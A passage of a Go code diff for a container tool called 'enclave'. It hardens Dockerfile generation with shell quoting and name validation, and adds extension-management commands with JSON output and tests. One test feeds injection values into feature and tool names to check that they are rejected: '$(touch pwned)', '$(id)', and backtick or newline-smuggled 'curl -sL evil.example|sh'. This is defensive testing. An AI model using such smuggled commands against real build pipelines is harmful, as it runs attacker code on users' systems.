 			} else {
@@ -127,7 +136,7 @@ func generateFeatureInstallBlock(features []featureInstall) string {
 				b.WriteString("RUN --mount=type=cache,id=enclave-npm-${USER_ID},target=/home/${USERNAME}/.npm,uid=${USER_ID},gid=${GROUP_ID} \\\n")
 				b.WriteString("    --mount=type=cache,id=enclave-gomod-${USER_ID},target=/home/${USERNAME}/go/pkg/mod,uid=${USER_ID},gid=${GROUP_ID} \\\n")
 				b.WriteString("    --mount=type=cache,id=enclave-uv-${USER_ID},target=/home/${USERNAME}/.cache/uv,uid=${USER_ID},gid=${GROUP_ID} \\\n")
-				fmt.Fprintf(&b, "    FEATURES=%q \\\n", name)
+				fmt.Fprintf(&b, "    FEATURES=%s \\\n", util.ShellQuote(name))
 				b.WriteString("    ENCLAVE_FEATURE_PHASE=user \\\n")
 				b.WriteString("    /opt/enclave/build-scripts/run-feature-installs.sh\n")
 			}
@@ -135,7 +144,7 @@ func generateFeatureInstallBlock(features []featureInstall) string {
 		if feature.HasInstallCommands {
 			if feature.InstallCommandsNeedRoot {
 				b.WriteString("USER root\n")
-				fmt.Fprintf(&b, "RUN FEATURES=%q \\\n", name)
+				fmt.Fprintf(&b, "RUN FEATURES=%s \\\n", util.ShellQuote(name))
 				b.WriteString("    ENCLAVE_AGENT_USER=${USERNAME} \\\n")
 				b.WriteString("    /opt/enclave/build-scripts/install-extension-commands.sh\n")
 			} else {
@@ -143,7 +152,7 @@ func generateFeatureInstallBlock(features []featureInstall) string {
 				b.WriteString("RUN --mount=type=cache,id=enclave-npm-${USER_ID},target=/home/${USERNAME}/.npm,uid=${USER_ID},gid=${GROUP_ID} \\\n")
 				b.WriteString("    --mount=type=cache,id=enclave-gomod-${USER_ID},target=/home/${USERNAME}/go/pkg/mod,uid=${USER_ID},gid=${GROUP_ID} \\\n")
 				b.WriteString("    --mount=type=cache,id=enclave-uv-${USER_ID},target=/home/${USERNAME}/.cache/uv,uid=${USER_ID},gid=${GROUP_ID} \\\n")
-				fmt.Fprintf(&b, "    FEATURES=%q \\\n", name)
+				fmt.Fprintf(&b, "    FEATURES=%s \\\n", util.ShellQuote(name))
 				b.WriteString("    /opt/enclave/build-scripts/install-extension-commands.sh\n")
 			}
 		}
@@ -196,6 +205,11 @@ func generateToolInstallBlock(tools []string, stamps map[string]string, forceToo
 		}
 		if seen[name] {
 			return "", fmt.Errorf("duplicate tool: %s", name)
+		}
+		if err := config.ValidateExtensionName(name); err != nil {
+			// A tool name becomes a build stage name and an unquoted operand of
+			// enclave-install-tool.
+			return "", err
 		}
 		seen[name] = true
 		stamp := stamps[name]

--- a/internal/app/dockerfile_gen_test.go
+++ b/internal/app/dockerfile_gen_test.go
@@ -49,32 +49,32 @@ func TestGenerateFeatureInstallBlockScopesPerFeature(t *testing.T) {
 	}
 
 	// devtools: apt install + user-phase script (with the package cache mounts).
-	if !strings.Contains(block, `FEATURES="devtools" /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
+	if !strings.Contains(block, `FEATURES='devtools' /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
 		t.Fatalf("expected devtools apt install, got:\n%s", block)
 	}
 	if !strings.Contains(block, `--mount=type=cache,id=enclave-npm-${USER_ID}`) ||
-		!strings.Contains(block, `FEATURES="devtools" \`) {
+		!strings.Contains(block, `FEATURES='devtools' \`) {
 		t.Fatalf("expected devtools user-phase script with cache mounts, got:\n%s", block)
 	}
 
 	// github-cli: root-phase script, no apt install, no package cache mounts.
-	if !strings.Contains(block, `FEATURES="github-cli" \`) || !strings.Contains(block, "ENCLAVE_FEATURE_PHASE=root") {
+	if !strings.Contains(block, `FEATURES='github-cli' \`) || !strings.Contains(block, "ENCLAVE_FEATURE_PHASE=root") {
 		t.Fatalf("expected github-cli root-phase script, got:\n%s", block)
 	}
-	if strings.Contains(block, `FEATURES="github-cli" /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
+	if strings.Contains(block, `FEATURES='github-cli' /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
 		t.Fatalf("github-cli has no apt packages and must not emit an apt install, got:\n%s", block)
 	}
 
 	// apt-sample: apt only, no script run.
-	if !strings.Contains(block, `FEATURES="apt-sample" /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
+	if !strings.Contains(block, `FEATURES='apt-sample' /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
 		t.Fatalf("expected apt-sample apt install, got:\n%s", block)
 	}
-	if strings.Contains(block, `FEATURES="apt-sample" \`) {
+	if strings.Contains(block, `FEATURES='apt-sample' \`) {
 		t.Fatalf("apt-sample has no install script and must not run one, got:\n%s", block)
 	}
 
 	// node-dev: user script only, no apt install.
-	if strings.Contains(block, `FEATURES="node-dev" /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
+	if strings.Contains(block, `FEATURES='node-dev' /opt/enclave/build-scripts/install-feature-apt-packages.sh`) {
 		t.Fatalf("node-dev has no apt packages and must not emit an apt install, got:\n%s", block)
 	}
 
@@ -258,5 +258,49 @@ func TestRenderDockerfileMissingFeatureMarker(t *testing.T) {
 	}
 	if _, err := renderDockerfile(path, []string{"claude"}, nil, nil, nil); err == nil {
 		t.Fatal("expected error when feature marker is missing")
+	}
+}
+
+// A feature name failing config.ValidateExtensionName must not reach the
+// generated Dockerfile at all.
+func TestGenerateFeatureInstallBlockSkipsUnsafeNames(t *testing.T) {
+	for _, name := range []string{
+		"jq-helper$(touch pwned)",
+		"jq-helper`curl -sL evil.example|sh`",
+		"jq-helper\nRUN curl -sL evil.example|sh #",
+	} {
+		block := generateFeatureInstallBlock([]featureInstall{
+			{Name: name, Priority: 100, HasApt: true},
+		})
+		if strings.Contains(block, "jq-helper") {
+			t.Fatalf("unsafe name %q was interpolated:\n%s", name, block)
+		}
+		if strings.Contains(block, "install-feature-apt-packages.sh") {
+			t.Fatalf("unsafe name %q still produced an install line:\n%s", name, block)
+		}
+	}
+}
+
+// FEATURES must be single-quoted: double quotes leave "$" and backticks live
+// for the shell that runs the instruction.
+func TestGenerateFeatureInstallBlockQuotesName(t *testing.T) {
+	block := generateFeatureInstallBlock([]featureInstall{
+		{Name: "node-dev", Priority: 70, HasApt: true, HasScript: true},
+		{Name: "cmd-sample", Priority: 80, HasInstallCommands: true, InstallCommandsNeedRoot: true},
+	})
+	for _, want := range []string{"FEATURES='node-dev'", "FEATURES='cmd-sample'"} {
+		if !strings.Contains(block, want) {
+			t.Errorf("missing %q in:\n%s", want, block)
+		}
+	}
+	if strings.Contains(block, "FEATURES=\"") {
+		t.Errorf("FEATURES must not be double-quoted:\n%s", block)
+	}
+}
+
+// An unsafe tool name must fail the generator rather than BuildKit.
+func TestGenerateToolInstallBlockRejectsUnsafeName(t *testing.T) {
+	if _, err := generateToolInstallBlock([]string{"claude$(id)"}, nil, nil); err == nil {
+		t.Fatal("expected an error for an unsafe tool name")
 	}
 }

--- a/internal/app/extension_cmd.go
+++ b/internal/app/extension_cmd.go
@@ -33,7 +33,7 @@ func runExtensionList(ctx *AppContext) int {
 	} else {
 		for _, name := range tools {
 			builtinDir, userDir := config.ResolveToolDirs(ctx.Paths, name)
-			source := extensionSourceLabel(builtinDir, userDir)
+			source := config.SourceLabel(builtinDir, userDir)
 			description := ""
 			if ext, loadErr := config.LoadToolExtension(ctx.Paths, name); loadErr == nil {
 				description = strings.TrimSpace(ext.Description)
@@ -53,7 +53,7 @@ func runExtensionList(ctx *AppContext) int {
 	} else {
 		for _, ext := range features {
 			builtinDir, userDir := config.ResolveFeatureDirs(ctx.Paths, ext.Name)
-			source := extensionSourceLabel(builtinDir, userDir)
+			source := config.SourceLabel(builtinDir, userDir)
 			printExtensionLine(ext.Name, source, strings.TrimSpace(ext.Description))
 		}
 	}
@@ -71,17 +71,6 @@ func loadErrorSummary(err error) string {
 		msg = msg[:maxLen-1] + "…"
 	}
 	return msg
-}
-
-func extensionSourceLabel(builtinDir string, userDir string) string {
-	switch {
-	case builtinDir != "" && userDir != "":
-		return "override"
-	case userDir != "":
-		return "user"
-	default:
-		return "builtin"
-	}
 }
 
 func printExtensionLine(name string, source string, description string) {

--- a/internal/app/extension_manage_cmd.go
+++ b/internal/app/extension_manage_cmd.go
@@ -1,0 +1,117 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"os"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/logx"
+	"enclave/internal/model"
+)
+
+// newExtinstallEnv wires the installer to the real host.
+func newExtinstallEnv(ctx *AppContext, req extinstall.Request) (extinstall.Env, error) {
+	host, err := ctx.Host()
+	if err != nil {
+		return extinstall.Env{}, err
+	}
+	fetcher, err := extinstall.NewGitFetcher()
+	if err != nil {
+		return extinstall.Env{}, err
+	}
+	return extinstall.Env{
+		Paths:     ctx.Paths,
+		Home:      host.Home,
+		Fetcher:   fetcher,
+		Stdin:     os.Stdin,
+		Narration: narrationWriter(req),
+		Version:   "enclave " + model.Version,
+	}, nil
+}
+
+// narrationWriter discards narration under --json, where the result envelope on
+// stdout is the whole report.
+func narrationWriter(req extinstall.Request) io.Writer {
+	if req.JSON {
+		return nil
+	}
+	return os.Stdout
+}
+
+// extensionOp is the shape of extinstall.Add/Update/Remove.
+type extensionOp func(context.Context, extinstall.Env, extinstall.Request) ([]extinstall.ActionResult, error)
+
+// extensionOps has no OpList entry: listing is served by the `tools`/`features`
+// handlers.
+var extensionOps = map[extinstall.Op]extensionOp{
+	extinstall.OpAdd:    extinstall.Add,
+	extinstall.OpUpdate: extinstall.Update,
+	extinstall.OpRemove: extinstall.Remove,
+}
+
+func runExtensionManage(ctx *AppContext, req *extinstall.Request) int {
+	if req == nil {
+		logx.Errorf("missing extension request")
+		return 1
+	}
+	op, ok := extensionOps[req.Op]
+	if !ok {
+		return reportExtensionResults(*req, nil, fmt.Errorf("unsupported %s operation %q", req.Kind.Label(), req.Op))
+	}
+	env, err := newExtinstallEnv(ctx, *req)
+	if err != nil {
+		return reportExtensionResults(*req, nil, err)
+	}
+	results, err := op(context.Background(), env, *req)
+	return reportExtensionResults(*req, results, err)
+}
+
+// reportExtensionResults renders the outcome and returns the process exit code.
+func reportExtensionResults(req extinstall.Request, results []extinstall.ActionResult, err error) int {
+	if req.JSON {
+		if err != nil {
+			results = append(results, extinstall.ActionResult{Action: extinstall.ActionFailed, Error: err.Error()})
+		}
+		if writeErr := writeExtensionResultsJSON(os.Stdout, req.Kind, results); writeErr != nil {
+			logx.Errorf("%v", writeErr)
+			return 1
+		}
+		return extensionExitCode(results, err)
+	}
+	if err != nil {
+		logx.Errorf("%v", err)
+	}
+	for _, result := range results {
+		if result.Action != extinstall.ActionFailed {
+			continue
+		}
+		logx.Errorf("%s", extensionErrorLine(result))
+	}
+	return extensionExitCode(results, err)
+}
+
+// extensionErrorLine formats one failed result for the human-facing log.
+// Installer error messages never name the extension; ActionResult.Name does,
+// and an empty one means a whole-run failure.
+func extensionErrorLine(result extinstall.ActionResult) string {
+	if result.Name == "" {
+		return result.Error
+	}
+	return fmt.Sprintf("%s: %s", result.Name, result.Error)
+}
+
+func extensionExitCode(results []extinstall.ActionResult, err error) int {
+	if err != nil || extinstall.HasFailure(results) {
+		return 1
+	}
+	return 0
+}

--- a/internal/app/extension_manage_cmd.go
+++ b/internal/app/extension_manage_cmd.go
@@ -34,8 +34,18 @@ func newExtinstallEnv(ctx *AppContext, req extinstall.Request) (extinstall.Env, 
 		Fetcher:   fetcher,
 		Stdin:     os.Stdin,
 		Narration: narrationWriter(req),
+		Style:     extinstall.TerminalStyle(narrationFile(req)),
 		Version:   "enclave " + model.Version,
 	}, nil
+}
+
+// narrationFile is the terminal narration is styled for, or nil under --json,
+// where there is no narration to style.
+func narrationFile(req extinstall.Request) *os.File {
+	if req.JSON {
+		return nil
+	}
+	return os.Stdout
 }
 
 // narrationWriter discards narration under --json, where the result envelope on

--- a/internal/app/extension_manage_cmd.go
+++ b/internal/app/extension_manage_cmd.go
@@ -24,7 +24,7 @@ func newExtinstallEnv(ctx *AppContext, req extinstall.Request) (extinstall.Env, 
 	if err != nil {
 		return extinstall.Env{}, err
 	}
-	fetcher, err := extinstall.NewGitFetcher()
+	fetcher, err := extinstall.NewGitFetcher(!req.JSON)
 	if err != nil {
 		return extinstall.Env{}, err
 	}

--- a/internal/app/extension_manage_cmd_test.go
+++ b/internal/app/extension_manage_cmd_test.go
@@ -1,0 +1,92 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"errors"
+	"os"
+	"testing"
+
+	"enclave/internal/extinstall"
+
+	"enclave/internal/model"
+)
+
+func TestExtensionExitCode(t *testing.T) {
+	if code := extensionExitCode([]extinstall.ActionResult{{Action: extinstall.ActionInstalled}}, nil); code != 0 {
+		t.Errorf("success exit code = %d", code)
+	}
+	if code := extensionExitCode([]extinstall.ActionResult{{Action: extinstall.ActionFailed}}, nil); code != 1 {
+		t.Errorf("partial failure exit code = %d", code)
+	}
+	if code := extensionExitCode(nil, errors.New("boom")); code != 1 {
+		t.Errorf("error exit code = %d", code)
+	}
+}
+
+func TestExtensionErrorLine(t *testing.T) {
+	cases := []struct {
+		name   string
+		result extinstall.ActionResult
+		want   string
+	}{
+		{
+			name:   "per-extension failure",
+			result: extinstall.ActionResult{Name: "foo", Error: "has local modifications; pass --force to discard them"},
+			want:   "foo: has local modifications; pass --force to discard them",
+		},
+		{
+			name:   "aborted prompt",
+			result: extinstall.ActionResult{Name: "foo", Error: "aborted; nothing installed"},
+			want:   "foo: aborted; nothing installed",
+		},
+		{
+			name:   "whole-run failure",
+			result: extinstall.ActionResult{Error: "acme/kits contains no feature extension"},
+			want:   "acme/kits contains no feature extension",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := extensionErrorLine(tc.result); got != tc.want {
+				t.Errorf("extensionErrorLine(%+v) = %q, want %q", tc.result, got, tc.want)
+			}
+		})
+	}
+}
+
+func TestNarrationWriter(t *testing.T) {
+	if w := narrationWriter(extinstall.Request{JSON: true}); w != nil {
+		t.Errorf("narrationWriter(JSON=true) = %v, want nil", w)
+	}
+	if w := narrationWriter(extinstall.Request{JSON: false}); w != os.Stdout {
+		t.Errorf("narrationWriter(JSON=false) = %v, want os.Stdout", w)
+	}
+}
+
+func TestRunExtensionManageRejectsMissingRequest(t *testing.T) {
+	if code := runExtensionManage(nil, nil); code != 1 {
+		t.Errorf("runExtensionManage(nil request) = %d, want 1", code)
+	}
+}
+
+// OpList has no installer entry point; listing is served elsewhere.
+func TestRunExtensionManageRejectsUnknownOp(t *testing.T) {
+	req := &extinstall.Request{Kind: model.KindFeature, Op: extinstall.OpList}
+	if code := runExtensionManage(nil, req); code != 1 {
+		t.Errorf("runExtensionManage(OpList) = %d, want 1", code)
+	}
+}
+
+func TestExtensionOpsCoverEveryManagementOp(t *testing.T) {
+	for _, op := range []extinstall.Op{extinstall.OpAdd, extinstall.OpUpdate, extinstall.OpRemove} {
+		if extensionOps[op] == nil {
+			t.Errorf("extensionOps has no handler for %q", op)
+		}
+	}
+}

--- a/internal/app/extension_output.go
+++ b/internal/app/extension_output.go
@@ -1,0 +1,149 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/model"
+)
+
+// extensionSchemaVersion is the envelope version shared by `list --json` and
+// the add/update/remove result envelope. Both envelopes are integration
+// contracts: add fields, never rename or remove them.
+const extensionSchemaVersion = "1"
+
+// extensionListEnvelope is the JSON shape of `list --json`.
+type extensionListEnvelope struct {
+	SchemaVersion string                 `json:"schemaVersion"`
+	Kind          string                 `json:"kind"`
+	Extensions    []extensionListJSONExt `json:"extensions"`
+}
+
+// extensionListJSONExt is the JSON shape of one extension in `list --json`.
+type extensionListJSONExt struct {
+	Name        string               `json:"name"`
+	DisplayName string               `json:"displayName,omitempty"`
+	Description string               `json:"description,omitempty"`
+	Source      string               `json:"source"`
+	Enabled     bool                 `json:"enabled"`
+	Managed     bool                 `json:"managed"`
+	Origin      *extensionListOrigin `json:"origin,omitempty"`
+	// OriginError carries extinstall.Managed.Problem: provenance for a managed
+	// directory could not be read (e.g. a corrupt sidecar). When it is set,
+	// Origin is nil and Managed is false. Additive to the v1 contract.
+	OriginError string `json:"originError,omitempty"`
+}
+
+// extensionListOrigin mirrors extinstall.Origin plus locallyModified, which is
+// derived rather than stored on the sidecar.
+type extensionListOrigin struct {
+	Remote          string `json:"remote"`
+	Source          string `json:"source"`
+	Subpath         string `json:"subpath,omitempty"`
+	Ref             string `json:"ref"`
+	RefType         string `json:"refType"`
+	Commit          string `json:"commit"`
+	InstalledAt     string `json:"installedAt,omitempty"`
+	LocallyModified bool   `json:"locallyModified"`
+}
+
+// extensionListJSONEntries projects extensions and their inventory into the
+// `list --json` entry shape. enabled reports whether an extension would be
+// active for this invocation.
+func extensionListJSONEntries(exts []model.Extension, inventory map[string]extinstall.Managed, enabled func(name string) bool) []extensionListJSONExt {
+	entries := make([]extensionListJSONExt, 0, len(exts))
+	for _, ext := range exts {
+		managed := inventory[ext.Name]
+		item := extensionListJSONExt{
+			Name:        ext.Name,
+			DisplayName: ext.DisplayName,
+			Description: ext.Description,
+			Source:      managed.Source,
+			Enabled:     enabled(ext.Name),
+			Managed:     managed.Origin != nil,
+			OriginError: managed.Problem,
+		}
+		if managed.Origin != nil {
+			item.Origin = &extensionListOrigin{
+				Remote:          managed.Origin.Remote,
+				Source:          managed.Origin.Source,
+				Subpath:         managed.Origin.Subpath,
+				Ref:             managed.Origin.Ref,
+				RefType:         managed.Origin.RefType,
+				Commit:          managed.Origin.Commit,
+				InstalledAt:     managed.Origin.InstalledAt,
+				LocallyModified: managed.Modified,
+			}
+		}
+		entries = append(entries, item)
+	}
+	return entries
+}
+
+func renderExtensionListJSON(w io.Writer, kind model.ExtensionKind, entries []extensionListJSONExt) error {
+	if entries == nil {
+		// "extensions" is always a JSON array, never null.
+		entries = []extensionListJSONExt{}
+	}
+	return encodeIndentedJSON(w, extensionListEnvelope{
+		SchemaVersion: extensionSchemaVersion,
+		Kind:          string(kind),
+		Extensions:    entries,
+	})
+}
+
+// extensionResultsEnvelope is the JSON shape of the add/update/remove result
+// envelope.
+type extensionResultsEnvelope struct {
+	SchemaVersion string                    `json:"schemaVersion"`
+	Kind          string                    `json:"kind"`
+	Results       []extinstall.ActionResult `json:"results"`
+}
+
+func writeExtensionResultsJSON(w io.Writer, kind model.ExtensionKind, results []extinstall.ActionResult) error {
+	if results == nil {
+		// "results" is always a JSON array, never null.
+		results = []extinstall.ActionResult{}
+	}
+	return encodeIndentedJSON(w, extensionResultsEnvelope{
+		SchemaVersion: extensionSchemaVersion,
+		Kind:          string(kind),
+		Results:       results,
+	})
+}
+
+func encodeIndentedJSON(w io.Writer, v any) error {
+	encoder := json.NewEncoder(w)
+	encoder.SetIndent("", "  ")
+	return encoder.Encode(v)
+}
+
+// provenanceSuffix renders the bracketed provenance appended to a listing line
+// for a managed extension: the text counterpart of the origin object in
+// `list --json`. Unmanaged and built-in entries get nothing.
+func provenanceSuffix(entry extinstall.Managed) string {
+	if entry.Origin == nil {
+		if entry.Problem != "" {
+			return " [provenance unreadable]"
+		}
+		return ""
+	}
+	label := entry.Origin.Source
+	if label == "" {
+		label = entry.Origin.Remote
+	}
+	suffix := fmt.Sprintf(" [%s@%s", label, extinstall.ShortCommit(entry.Origin.Commit))
+	if entry.Modified {
+		suffix += ", modified"
+	}
+	return suffix + "]"
+}

--- a/internal/app/extension_output_test.go
+++ b/internal/app/extension_output_test.go
@@ -1,0 +1,199 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"bytes"
+	"encoding/json"
+	"reflect"
+	"testing"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/model"
+)
+
+func TestRenderExtensionListJSON(t *testing.T) {
+	entries := extensionListJSONEntries(
+		[]model.Extension{{Name: "foo", DisplayName: "Foo", Description: "A test feature"}},
+		map[string]extinstall.Managed{"foo": {
+			Name:   "foo",
+			Source: "user",
+			Origin: &extinstall.Origin{
+				SchemaVersion: extinstall.OriginSchemaVersion,
+				Remote:        "https://github.com/acme/kits",
+				Source:        "acme/kits",
+				Ref:           "main",
+				RefType:       extinstall.RefTypeBranch,
+				Commit:        "a1b2c3d4",
+			},
+		}},
+		func(string) bool { return true },
+	)
+
+	var out bytes.Buffer
+	if err := renderExtensionListJSON(&out, model.KindFeature, entries); err != nil {
+		t.Fatalf("renderExtensionListJSON: %v", err)
+	}
+
+	var decoded struct {
+		SchemaVersion string `json:"schemaVersion"`
+		Kind          string `json:"kind"`
+		Extensions    []struct {
+			Name        string `json:"name"`
+			DisplayName string `json:"displayName"`
+			Enabled     bool   `json:"enabled"`
+			Managed     bool   `json:"managed"`
+			Origin      *struct {
+				Commit          string `json:"commit"`
+				LocallyModified bool   `json:"locallyModified"`
+			} `json:"origin"`
+		} `json:"extensions"`
+	}
+	if err := json.Unmarshal(out.Bytes(), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out.String())
+	}
+	if decoded.SchemaVersion != "1" || decoded.Kind != "feature" {
+		t.Fatalf("envelope = %+v", decoded)
+	}
+	if len(decoded.Extensions) != 1 || !decoded.Extensions[0].Managed {
+		t.Fatalf("extensions = %+v", decoded.Extensions)
+	}
+	if decoded.Extensions[0].DisplayName != "Foo" || !decoded.Extensions[0].Enabled {
+		t.Errorf("extension = %+v, want displayName Foo and enabled", decoded.Extensions[0])
+	}
+	if decoded.Extensions[0].Origin == nil || decoded.Extensions[0].Origin.Commit != "a1b2c3d4" {
+		t.Fatalf("origin = %+v", decoded.Extensions[0].Origin)
+	}
+}
+
+func TestRenderExtensionListJSONOmitsOriginWhenUnmanaged(t *testing.T) {
+	var out bytes.Buffer
+	entries := extensionListJSONEntries(
+		[]model.Extension{{Name: "builtin"}},
+		map[string]extinstall.Managed{"builtin": {Name: "builtin", Source: "builtin"}},
+		func(string) bool { return true },
+	)
+	if err := renderExtensionListJSON(&out, model.KindTool, entries); err != nil {
+		t.Fatalf("renderExtensionListJSON: %v", err)
+	}
+	if bytes.Contains(out.Bytes(), []byte(`"origin"`)) {
+		t.Fatalf("unmanaged entry carries an origin key:\n%s", out.String())
+	}
+}
+
+func TestRenderExtensionListJSONReportsOriginError(t *testing.T) {
+	const problem = `feature "broken": parse .enclave-source.json: unexpected end of JSON input`
+	entries := extensionListJSONEntries(
+		[]model.Extension{{Name: "broken"}},
+		map[string]extinstall.Managed{"broken": {Name: "broken", Source: "user", Problem: problem}},
+		func(string) bool { return true },
+	)
+
+	var out bytes.Buffer
+	if err := renderExtensionListJSON(&out, model.KindFeature, entries); err != nil {
+		t.Fatalf("renderExtensionListJSON: %v", err)
+	}
+
+	var decoded struct {
+		Extensions []struct {
+			Name        string          `json:"name"`
+			Managed     bool            `json:"managed"`
+			Origin      json.RawMessage `json:"origin"`
+			OriginError string          `json:"originError"`
+		} `json:"extensions"`
+	}
+	if err := json.Unmarshal(out.Bytes(), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out.String())
+	}
+	if len(decoded.Extensions) != 1 {
+		t.Fatalf("extensions = %+v", decoded.Extensions)
+	}
+	got := decoded.Extensions[0]
+	if got.Managed {
+		t.Error("managed = true, want false for an entry with a provenance error")
+	}
+	if got.Origin != nil {
+		t.Errorf("origin = %s, want absent for an entry with a provenance error", got.Origin)
+	}
+	if got.OriginError != problem {
+		t.Errorf("originError = %q, want %q", got.OriginError, problem)
+	}
+}
+
+func TestProvenanceSuffix(t *testing.T) {
+	managed := extinstall.Managed{
+		Name:   "foo",
+		Source: "user",
+		Origin: &extinstall.Origin{Source: "acme/kits", Remote: "https://github.com/acme/kits", Commit: "a1b2c3d4e5f6"},
+	}
+	cases := []struct {
+		name  string
+		entry extinstall.Managed
+		want  string
+	}{
+		{name: "managed", entry: managed, want: " [acme/kits@a1b2c3d]"},
+		{
+			name:  "managed and edited by hand",
+			entry: extinstall.Managed{Name: "foo", Source: "user", Origin: managed.Origin, Modified: true},
+			want:  " [acme/kits@a1b2c3d, modified]",
+		},
+		{
+			name:  "no raw source falls back to the redacted remote",
+			entry: extinstall.Managed{Name: "foo", Origin: &extinstall.Origin{Remote: "https://github.com/acme/kits", Commit: "a1b2c3d4e5f6"}},
+			want:  " [https://github.com/acme/kits@a1b2c3d]",
+		},
+		{
+			name:  "provenance unreadable",
+			entry: extinstall.Managed{Name: "broken", Source: "user", Problem: `feature "broken": corrupt sidecar`},
+			want:  " [provenance unreadable]",
+		},
+		{name: "built-in", entry: extinstall.Managed{Name: "builtin", Source: "builtin"}, want: ""},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := provenanceSuffix(tc.entry); got != tc.want {
+				t.Errorf("provenanceSuffix = %q, want %q", got, tc.want)
+			}
+		})
+	}
+}
+
+// The add/update/remove envelope carries the same schemaVersion as
+// `list --json`, and "results" is always an array.
+func TestWriteExtensionResultsJSON(t *testing.T) {
+	var out bytes.Buffer
+	if err := writeExtensionResultsJSON(&out, model.KindFeature, nil); err != nil {
+		t.Fatalf("writeExtensionResultsJSON: %v", err)
+	}
+	var decoded struct {
+		SchemaVersion string                    `json:"schemaVersion"`
+		Kind          string                    `json:"kind"`
+		Results       []extinstall.ActionResult `json:"results"`
+	}
+	if err := json.Unmarshal(out.Bytes(), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out.String())
+	}
+	if decoded.SchemaVersion != extensionSchemaVersion || decoded.Kind != "feature" {
+		t.Fatalf("envelope = %+v", decoded)
+	}
+	if !bytes.Contains(out.Bytes(), []byte(`"results": []`)) {
+		t.Fatalf("\"results\" must be an array, never null:\n%s", out.String())
+	}
+
+	out.Reset()
+	results := []extinstall.ActionResult{{Name: "foo", Action: extinstall.ActionInstalled, Commit: "a1b2c3d4", Path: "/tmp/foo"}}
+	if err := writeExtensionResultsJSON(&out, model.KindTool, results); err != nil {
+		t.Fatalf("writeExtensionResultsJSON: %v", err)
+	}
+	if err := json.Unmarshal(out.Bytes(), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out.String())
+	}
+	if len(decoded.Results) != 1 || !reflect.DeepEqual(decoded.Results[0], results[0]) {
+		t.Fatalf("results = %+v", decoded.Results)
+	}
+}

--- a/internal/app/extension_sidecar_build_test.go
+++ b/internal/app/extension_sidecar_build_test.go
@@ -1,0 +1,65 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+const sidecarFixtureSpec = "schemaVersion: \"1\"\nkind: mixin\nname: foo\n"
+
+func sidecarFixturePaths(t *testing.T) model.Paths {
+	t.Helper()
+	paths := writeTestBuildPaths(t)
+	paths.FeaturesDir = filepath.Join(paths.AppRoot, "extensions", "features")
+	paths.UserExtensionsDir = filepath.Join(paths.AppRoot, "user", "extensions")
+	paths.UserToolsDir = filepath.Join(paths.UserExtensionsDir, "tools")
+	paths.UserFeaturesDir = filepath.Join(paths.UserExtensionsDir, "features")
+	writeAppFile(t, filepath.Join(paths.FeaturesDir, "foo", "spec.yaml"), sidecarFixtureSpec, 0o644)
+	return paths
+}
+
+func TestMergedExtensionFilesExcludesSourceSidecar(t *testing.T) {
+	paths := sidecarFixturePaths(t)
+	writeAppFile(t, filepath.Join(paths.UserFeaturesDir, "foo", "spec.yaml"), sidecarFixtureSpec, 0o644)
+	writeAppFile(t, filepath.Join(paths.UserFeaturesDir, "foo", model.ExtensionSourceFilename), `{"commit":"abc"}`, 0o644)
+
+	selection := runtimeImageSelection{Tools: []string{}, Features: []string{"foo"}}
+	files, err := mergedExtensionFiles(paths, selection)
+	if err != nil {
+		t.Fatalf("mergedExtensionFiles: %v", err)
+	}
+	for _, file := range files {
+		if strings.HasSuffix(file.RelativePath, model.ExtensionSourceFilename) {
+			t.Fatalf("sidecar leaked into the build context: %s", file.RelativePath)
+		}
+	}
+}
+
+func TestExtensionHashIgnoresSourceSidecar(t *testing.T) {
+	paths := sidecarFixturePaths(t)
+	writeAppFile(t, filepath.Join(paths.UserFeaturesDir, "foo", "spec.yaml"), sidecarFixtureSpec, 0o644)
+	selection := runtimeImageSelection{Tools: []string{}, Features: []string{"foo"}}
+
+	before, err := hashMergedExtensionFiles(paths, selection)
+	if err != nil {
+		t.Fatalf("hash before: %v", err)
+	}
+	writeAppFile(t, filepath.Join(paths.UserFeaturesDir, "foo", model.ExtensionSourceFilename), `{"commit":"def"}`, 0o644)
+	after, err := hashMergedExtensionFiles(paths, selection)
+	if err != nil {
+		t.Fatalf("hash after: %v", err)
+	}
+	if before != after {
+		t.Fatalf("image hash changed when only the sidecar changed: %s -> %s", before, after)
+	}
+}

--- a/internal/app/features.go
+++ b/internal/app/features.go
@@ -9,14 +9,22 @@ package app
 
 import (
 	"fmt"
+	"os"
 
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
